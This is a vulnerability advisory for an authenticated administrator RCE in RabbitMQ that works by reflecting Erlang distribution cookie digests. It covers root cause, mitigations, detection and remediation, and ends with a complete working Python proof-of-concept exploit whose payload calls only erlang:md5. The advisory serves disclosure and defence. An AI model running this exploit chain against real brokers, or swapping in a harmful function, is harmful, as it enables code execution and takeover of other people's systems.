Описание
RabbitMQ administrator RCE through reflected Erlang distribution authentication
Summary
This advisory describes a complex attack that requires administrative access
to the HTTP API and a number of other variables to hold true.
A RabbitMQ management user with the administrator tag can escalate from
broker administration to arbitrary BEAM function execution without knowing the
Erlang distribution cookie and without local operating-system access.
The chain combines three behaviors:
- Administrator-accessible global-parameter names are converted into new
Erlang atoms. This lets the attacker intern two node names such as
evil@attacker and oracle@attacker.
DELETE /api/reset/:node accepts any existing node atom and performs
rabbit:is_running(Node) before checking whether the node is a cluster
member. Two concurrent requests initiate two outbound Erlang distribution
handshakes to attacker-controlled nodes.
- OTP 27's legacy cookie digest is bound to the cookie and challenge but not
the peer identity, connection direction, or complete transcript. The digest
produced on one outbound connection can authenticate the other.
After authentication, the attacker can send a registered distribution message
to rex and choose the module, function, and argument list.
The proof is intentionally non-destructive: it invokes only
erlang:md5(Nonce) and verifies the returned digest.
This is an authenticated administrator RCE.
Preconditions
- Valid management credentials with the
administrator tag.
- The RabbitMQ management plugin and reset/global-parameter routes are
reachable.
- The broker resolves an attacker-controlled hostname used in Erlang node
names.
- Broker egress can reach attacker-controlled TCP 4369 (EPMD).
- Broker egress can reach two attacker-controlled distribution ports returned
by EPMD.
- Plain OTP 27 distribution, or another transport configuration that accepts
the attacker endpoints, is in use.
- Both outbound handshakes use the same RabbitMQ cookie.
The attacker does not need:
- The Erlang cookie value.
- Local shell or filesystem access.
- Existing cluster membership.
- Plugin or code-path write access.
- Access to RabbitMQ's data directory.
Workarounds
One of:
- Block traffic to the rarely used
DELETE /api/reset/{node} HTTP APi endpoint
- Restrict port
4369 (epmd) and 25672 (used by RabbitMQ nodes, the value is the default) access only to the hosts that run RabbitMQ cluster members
- Disable the
rabbitmq_management plugin and use Prometheus and Grafana plus CLI tools for monitoring
Root cause
1. Global-parameter names create node atoms
The management global-parameter route passes its raw path name into:
%% deps/rabbit/src/rabbit_runtime_parameters.erl
set_global(Name, Term, ActingUser) ->
NameAsAtom = rabbit_data_coercion:to_atom(Name),
...
binary_to_atom/2 is ultimately used, so requests for:
PUT /api/global-parameters/evil@attacker
PUT /api/global-parameters/oracle@attacker
create atoms usable as Erlang node identities.
2. Reset performs RPC before membership validation
The reset resource converts the route value with
binary_to_existing_atom/2, then calls rabbit:is_running(Node) during
resource lookup.
For a nonlocal node, rabbit:is_running/1 executes:
rpc:call(Node, rabbit, is_running, [])
No cluster-membership check occurs before this network operation. The final
HTTP response can be 404; the outbound EPMD lookup and distribution connection
have already occurred.
Relevant source at the verified commit:
deps/rabbitmq_management/src/rabbit_mgmt_wm_global_parameter.erl:48-76
deps/rabbit/src/rabbit_runtime_parameters.erl:95-112
deps/rabbitmq_management/src/rabbit_mgmt_wm_reset.erl:24-56
deps/rabbit/src/rabbit.erl:862-875
3. Cookie challenge responses are reflectable
For the legacy distribution digest:
H(K, N) = MD5(K || decimal(N))
where K is the cookie and N is a challenge:
- Attacker node
evil supplies challenge Ns.
- RabbitMQ returns its challenge
Nt and H(K, Ns).
- The attacker holds this connection.
- Attacker node
oracle uses Nt as its challenge.
- RabbitMQ returns
H(K, Nt) on the oracle connection.
- The attacker copies that digest into the held connection's acknowledgement.
- RabbitMQ authenticates the held connection without disclosing
K.
Two different peer names prevent normal simultaneous-connection arbitration
from collapsing the handshakes.
4. An authenticated distribution peer can invoke rex
The authenticated connection sends a standard registered-send distribution
message to rex containing:
{'$gen_call', {AttackerPid, Tag},
{call, Module, Function, Arguments, AttackerPid}}
The attacker controls Module, Function, Arguments, the external PID, and
the correlation tag.
Basic Python proof of concept
Attachment: rabbitmq-administrator-distribution-reflection-rce-poc.py
The attachment is one Python 3 file using only the standard library. It
implements:
- A minimal EPMD responder.
- Two minimal OTP 27 distribution listeners.
- Challenge reflection.
- The four authenticated RabbitMQ management requests.
- A safe
erlang:md6/1 negative control.
- A safe
erlang:md5/1 positive arbitrary-MFA proof.
Target requirements
- An administrator account.
- Management API reachable on port 15672 or another configured port.
- The hostname
attacker must resolve from the broker to the machine running
the PoC.
- TCP 4369, 19101, and 19102 on the PoC machine must be reachable from the
broker.
- Binding TCP 4369 usually requires root or
CAP_NET_BIND_SERVICE.
Run
On the attacker-controlled host:
sudo python3 rabbitmq-administrator-distribution-reflection-rce-poc.py \
--management-host rabbitmq.example \
--management-port 15672 \
--user administrator \
--password administrator-password \
--attacker-hostname attacker
If management uses a path prefix:
sudo python3 rabbitmq-administrator-distribution-reflection-rce-poc.py \
--management-host rabbitmq.example \
--management-prefix mgmt \
--user administrator \
--password administrator-password
The PoC never calls os:cmd, reads a file, loads code, or spawns a shell.
Expected output:
{
"global_parameter_statuses": [201, 201],
"reset_statuses": [404, 404],
"epmd_queries": ["evil", "oracle"],
"authenticated_without_cookie": true,
"negative_control": {
"function": "md6",
"positive_digest_returned": false,
"undef_returned": true
},
"positive_control": {
"function": "md5",
"nonce": "5241424249544d515f5245464c454354494f4e5f5250435f4e4f4e4345",
"digest": "45b3d29a7c795310de18a3903393bcc1",
"correlated_reply": true
},
"errors": []
}
VULNERABLE
The two reset requests returning 404 is expected. The vulnerable outbound
connections occur during resource lookup before those responses.
End-to-end verification
Current upstream main
An isolated Docker verifier cloned, built, and ran exact commit:
005db70727583ba59f9b99da16b7ec3a8285ac9f
Erlang/OTP 27 [erts-15.2.7.10]
It produced:
DISTRIBUTION_REFLECTION_TRIGGER_OK
DISTRIBUTION_REFLECTION_RCE_RESULT_OK
LATEST_MAIN_DISTRIBUTION_REFLECTION_RCE_VERIFIED 005db70727583ba59f9b99da16b7ec3a8285ac9f
Ping succeeded
The source checkout remained unmodified and the broker remained healthy.
Released RabbitMQ Docker image
The single-file attachment was independently run against stock RabbitMQ 4.3.4
on Erlang/OTP 27 using two isolated Docker containers.
Observed:
global parameter responses: 201, 201
reset responses: 404, 404
EPMD queries: evil, oracle
authenticated without cookie: true
erlang:md6/1 negative control returned undef: true
erlang:md5/1 correlated digest: 45b3d29a7c795310de18a3903393bcc1
VULNERABLE
SCRIPT_EXIT: 0
Ping succeeded
Impact
The demonstrated primitive is arbitrary BEAM MFA execution in the RabbitMQ VM.
Depending on modules available in the runtime, this can:
- Read or modify files accessible to the RabbitMQ operating-system account.
- Access broker credentials and in-memory state.
- Open network connections with the broker's privileges.
- Invoke operating-system command facilities exposed by loaded Erlang modules.
- Stop or corrupt the RabbitMQ node.
The proof does not exercise these destructive consequences.
Detection
Potential indicators:
- Administrator-authenticated global-parameter names containing
@.
- Two closely timed reset requests for nonmember node names.
- Reset responses returning 404 while outbound EPMD lookups occur.
- Broker egress to unapproved TCP 4369 endpoints.
- Distribution connections to nodes absent from cluster membership.
Temporary mitigations
- Restrict EPMD and distribution egress to explicit cluster peers.
- Use mutually authenticated TLS distribution with strict peer verification.
- Restrict administrator credentials and monitor their use.
- Block or proxy-filter reset requests for nonmember node names.
- Alert on node-shaped global-parameter names.
Recommended remediation
Reset route
- Resolve the supplied node only from current cluster membership before any
liveness check or RPC.
- Do not perform network operations from
resource_exists/2 using a
route-derived atom.
- Use the cluster-member validation already used by other management routes.
Global parameters
- Store unrestricted names as binaries.
- Do not create Erlang atoms from management path values.
- If atoms are unavoidable, use a finite existing-atom allowlist that cannot
create arbitrary node identities.
Distribution
- Coordinate with Erlang/OTP maintainers to bind challenge authentication to
peer identity, connection direction, and the complete transcript.
- Continue enforcing RabbitMQ-side membership checks even if OTP authentication
is strengthened.
Regression coverage
Add tests asserting that:
- A pre-interned nonmember supplied to
/api/reset/:node causes no EPMD query.
- Current cluster members retain expected reset behavior.
- Global-parameter names cannot create node-usable atoms.
- Two nonmember reset requests cannot initiate concurrent outbound handshakes.
POC script:
#!/usr/bin/env python3
"""Safe RabbitMQ administrator-to-BEAM-MFA distribution reflection PoC.
The only successful function invoked is erlang:md5/1 over a fixed nonce.
"""
from __future__ import annotations
import argparse
import base64
import concurrent.futures
import hashlib
import json
import socket
import struct
import threading
import time
import urllib.parse
NONCE = b"RABBITMQ_REFLECTION_RPC_NONCE"
EXPECTED_DIGEST = hashlib.md5(NONCE).digest()
LOCK = threading.Lock()
EVENTS: dict[str, list[dict]] = {}
REFLECTION = {"target_challenge": None, "reflected_digest": None}
def record(key: str, value: dict) -> None:
with LOCK:
EVENTS.setdefault(key, []).append(value)
def wait_event(key: str, timeout: float = 30) -> dict:
deadline = time.time() + timeout
while time.time() < deadline:
with LOCK:
values = EVENTS.get(key, [])
if values:
return values[-1]
time.sleep(0.05)
raise TimeoutError(f"event not observed: {key}")
def recv_exact(sock: socket.socket, size: int) -> bytes:
data = bytearray()
while len(data) < size:
chunk = sock.recv(size - len(data))
if not chunk:
raise EOFError("socket closed")
data.extend(chunk)
return bytes(data)
def recv_packet(sock: socket.socket, width: int) -> bytes:
size = int.from_bytes(recv_exact(sock, width), "big")
return recv_exact(sock, size)
def send_packet(sock: socket.socket, payload: bytes, width: int) -> None:
sock.sendall(len(payload).to_bytes(width, "big") + payload)
def atom(value: str) -> bytes:
encoded = value.encode()
if len(encoded) < 256:
return b"w" + bytes([len(encoded)]) + encoded
return b"v" + len(encoded).to_bytes(2, "big") + encoded
def small_integer(value: int) -> bytes:
return b"a" + bytes([value])
def tuple_ext(*items: bytes) -> bytes:
return b"h" + bytes([len(items)]) + b"".join(items)
def binary_ext(value: bytes) -> bytes:
return b"m" + len(value).to_bytes(4, "big") + value
def list_ext(items: list[bytes]) -> bytes:
return b"l" + len(items).to_bytes(4, "big") + b"".join(items) + b"j"
def new_pid(node_name: str) -> bytes:
return b"X" + atom(node_name) + struct.pack(">III", 1, 0, 1)
def rpc_packet(node_name: str, function_name: str) -> bytes:
sender = new_pid(node_name)
control = tuple_ext(small_integer(6), sender, atom(""), atom("rex"))
call = tuple_ext(
atom("call"),
atom("erlang"),
atom(function_name),
list_ext([binary_ext(NONCE)]),
sender,
)
from_tuple = tuple_ext(sender, atom(function_name + "_probe"))
message = tuple_ext(atom("$gen_call"), from_tuple, call)
return b"p\x83" + control + b"\x83" + message
def parse_name(payload: bytes) -> tuple[int, str]:
if payload[:1] == b"N":
flags = int.from_bytes(payload[1:9], "big")
name_len = int.from_bytes(payload[13:15], "big")
return flags, payload[15 : 15 + name_len].decode(errors="replace")
if payload[:1] == b"n":
flags = int.from_bytes(payload[1:5], "big")
return flags, payload[7:].decode(errors="replace")
raise ValueError(f"unexpected NAME packet: {payload[:1]!r}")
def challenge_packet(flags: int, challenge: int, name: str) -> bytes:
encoded = name.encode()
return (
b"N"
+ flags.to_bytes(8, "big")
+ challenge.to_bytes(4, "big")
+ (1).to_bytes(4, "big")
+ len(encoded).to_bytes(2, "big")
+ encoded
)
def distribution_listener(
port: int, fake_name: str, role: str, ready: threading.Event
) -> None:
listener = socket.socket()
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", port))
listener.listen(8)
ready.set()
while True:
conn, peer = listener.accept()
threading.Thread(
target=handle_distribution,
args=(conn, peer, fake_name, role),
daemon=True,
).start()
def handle_distribution(
conn: socket.socket, peer: tuple[str, int], fake_name: str, role: str
) -> None:
try:
target_flags, target_name = parse_name(recv_packet(conn, 2))
negotiated = target_flags & ~0x2000 & ~0x800000
send_packet(conn, b"sok", 2)
if role == "held":
challenge = 0x13572468
else:
deadline = time.time() + 15
while REFLECTION["target_challenge"] is None and time.time() < deadline:
time.sleep(0.01)
challenge = REFLECTION["target_challenge"]
if challenge is None:
raise TimeoutError("held connection challenge was not captured")
send_packet(
conn,
challenge_packet(negotiated, int(challenge), fake_name),
2,
)
reply = recv_packet(conn, 2)
if reply[:1] != b"r" or len(reply) != 21:
raise ValueError(f"unexpected challenge reply: {reply!r}")
target_challenge = int.from_bytes(reply[1:5], "big")
digest = reply[5:21]
record(
"distribution_handshake",
{
"role": role,
"peer": list(peer),
"target": target_name,
"server_challenge": challenge,
"target_challenge": target_challenge,
"digest": digest.hex(),
},
)
if role == "oracle":
REFLECTION["reflected_digest"] = digest
record("oracle", {"digest": digest.hex()})
time.sleep(2)
return
REFLECTION["target_challenge"] = target_challenge
deadline = time.time() + 15
while REFLECTION["reflected_digest"] is None and time.time() < deadline:
time.sleep(0.01)
reflected = REFLECTION["reflected_digest"]
if reflected is None:
raise TimeoutError("oracle digest was not captured")
send_packet(conn, b"a" + bytes(reflected), 2)
record("reflection", {"authenticated": True, "digest": bytes(reflected).hex()})
time.sleep(0.2)
send_packet(conn, rpc_packet(fake_name, "md6"), 4)
negative_packets: list[bytes] = []
negative_deadline = time.time() + 1.5
while time.time() < negative_deadline:
conn.settimeout(max(0.1, negative_deadline - time.time()))
try:
payload = recv_packet(conn, 4)
except socket.timeout:
break
if EXPECTED_DIGEST in payload:
raise AssertionError("negative control returned positive digest")
negative_packets.append(payload)
negative_reply = next(
(packet for packet in negative_packets if b"md6_probe" in packet),
None,
)
record(
"negative",
{
"function": "md6",
"positive_digest_returned": False,
"correlated_reply": negative_reply is not None,
"undef_returned": (
negative_reply is not None
and b"badrpc" in negative_reply
and b"undef" in negative_reply
),
},
)
send_packet(conn, rpc_packet(fake_name, "md5"), 4)
deadline = time.time() + 12
while time.time() < deadline:
conn.settimeout(max(0.1, deadline - time.time()))
try:
payload = recv_packet(conn, 4)
except socket.timeout:
break
if EXPECTED_DIGEST in payload and b"md5_probe" in payload:
record(
"positive",
{
"function": "md5",
"nonce": NONCE.hex(),
"digest": EXPECTED_DIGEST.hex(),
"correlated_reply": True,
},
)
return
record("positive", {"correlated_reply": False})
except Exception as exc:
record("error", {"role": role, "error": repr(exc)})
finally:
try:
conn.close()
except OSError:
pass
def epmd_server(
held_port: int,
oracle_port: int,
attacker_hostname: str,
ready: threading.Event,
) -> None:
ports = {b"evil": held_port, b"oracle": oracle_port}
listener = socket.socket()
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 4369))
listener.listen(32)
ready.set()
while True:
conn, peer = listener.accept()
threading.Thread(
target=handle_epmd,
args=(conn, peer, ports, attacker_hostname),
daemon=True,
).start()
def handle_epmd(
conn: socket.socket,
peer: tuple[str, int],
ports: dict[bytes, int],
attacker_hostname: str,
) -> None:
try:
request = recv_exact(conn, int.from_bytes(recv_exact(conn, 2), "big"))
if request[:1] != b"z":
raise ValueError(f"unexpected EPMD request: {request.hex()}")
name = request[1:]
port = ports.get(name)
record("epmd", {"name": name.decode(errors="replace"), "peer": list(peer)})
if port is None:
conn.sendall(b"w\x01")
return
full_name = name + b"@" + attacker_hostname.encode()
response = (
b"w\x00"
+ port.to_bytes(2, "big")
+ b"M\x00"
+ (6).to_bytes(2, "big")
+ (5).to_bytes(2, "big")
+ len(full_name).to_bytes(2, "big")
+ full_name
+ b"\x00\x00"
)
conn.sendall(response)
except Exception as exc:
record("error", {"service": "epmd", "error": repr(exc)})
finally:
conn.close()
def http_request(
host: str,
port: int,
method: str,
path: str,
credentials: str,
timeout: float = 30,
) -> int:
token = base64.b64encode(credentials.encode()).decode()
body = b'{"value":0}' if method == "PUT" else b""
headers = [
f"Host: {host}",
f"Authorization: Basic {token}",
"Connection: close",
]
if body:
headers += [
"Content-Type: application/json",
f"Content-Length: {len(body)}",
]
request = (
f"{method} {path} HTTP/1.1\r\n"
+ "\r\n".join(headers)
+ "\r\n\r\n"
).encode() + body
with socket.create_connection((host, port), timeout=timeout) as sock:
sock.settimeout(timeout)
sock.sendall(request)
response = bytearray()
while True:
try:
chunk = sock.recv(65_536)
except socket.timeout:
break
if not chunk:
break
response.extend(chunk)
if not response.startswith(b"HTTP/"):
return 0
return int(response.split(b" ", 2)[1])
def main() -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--management-host", required=True)
parser.add_argument("--management-port", type=int, default=15672)
parser.add_argument("--management-prefix", default="")
parser.add_argument("--user", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--attacker-hostname", default="attacker")
parser.add_argument("--held-port", type=int, default=19101)
parser.add_argument("--oracle-port", type=int, default=19102)
args = parser.parse_args()
held_name = f"evil@{args.attacker_hostname}"
oracle_name = f"oracle@{args.attacker_hostname}"
ready = [threading.Event(), threading.Event(), threading.Event()]
threads = [
threading.Thread(
target=epmd_server,
args=(
args.held_port,
args.oracle_port,
args.attacker_hostname,
ready[0],
),
daemon=True,
),
threading.Thread(
target=distribution_listener,
args=(args.held_port, held_name, "held", ready[1]),
daemon=True,
),
threading.Thread(
target=distribution_listener,
args=(args.oracle_port, oracle_name, "oracle", ready[2]),
daemon=True,
),
]
for thread in threads:
thread.start()
if not all(event.wait(5) for event in ready):
raise RuntimeError("attacker listeners failed to start")
credentials = f"{args.user}:{args.password}"
prefix = "/" + args.management_prefix.strip("/") if args.management_prefix else ""
api = prefix + "/api"
atom_statuses = []
for node in (held_name, oracle_name):
atom_statuses.append(
http_request(
args.management_host,
args.management_port,
"PUT",
api + "/global-parameters/" + urllib.parse.quote(node, safe="@-"),
credentials,
)
)
if not all(status in (201, 204) for status in atom_statuses):
raise RuntimeError(f"failed to create node atoms: {atom_statuses}")
def reset(node: str) -> int:
return http_request(
args.management_host,
args.management_port,
"DELETE",
api + "/reset/" + urllib.parse.quote(node, safe="@-"),
credentials,
)
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
reset_statuses = list(executor.map(reset, (held_name, oracle_name)))
reflection = wait_event("reflection")
oracle = wait_event("oracle")
negative = wait_event("negative")
positive = wait_event("positive")
result = {
"global_parameter_statuses": atom_statuses,
"reset_statuses": reset_statuses,
"epmd_queries": [item["name"] for item in EVENTS.get("epmd", [])],
"authenticated_without_cookie": reflection["authenticated"],
"reflection_digest_matches_oracle": reflection["digest"] == oracle["digest"],
"negative_control": negative,
"positive_control": positive,
"errors": EVENTS.get("error", []),
}
print(json.dumps(result, indent=2))
vulnerable = (
reset_statuses == [404, 404]
and set(result["epmd_queries"]) >= {"evil", "oracle"}
and reflection["authenticated"] is True
and result["reflection_digest_matches_oracle"] is True
and negative["function"] == "md6"
and negative["positive_digest_returned"] is False
and negative["correlated_reply"] is True
and negative["undef_returned"] is True
and positive["function"] == "md5"
and positive["digest"] == EXPECTED_DIGEST.hex()
and positive["correlated_reply"] is True
and not result["errors"]
)
print("VULNERABLE" if vulnerable else "NOT_REPRODUCED")
return 0 if vulnerable else 1
if __name__ == "__main__":
raise SystemExit(main())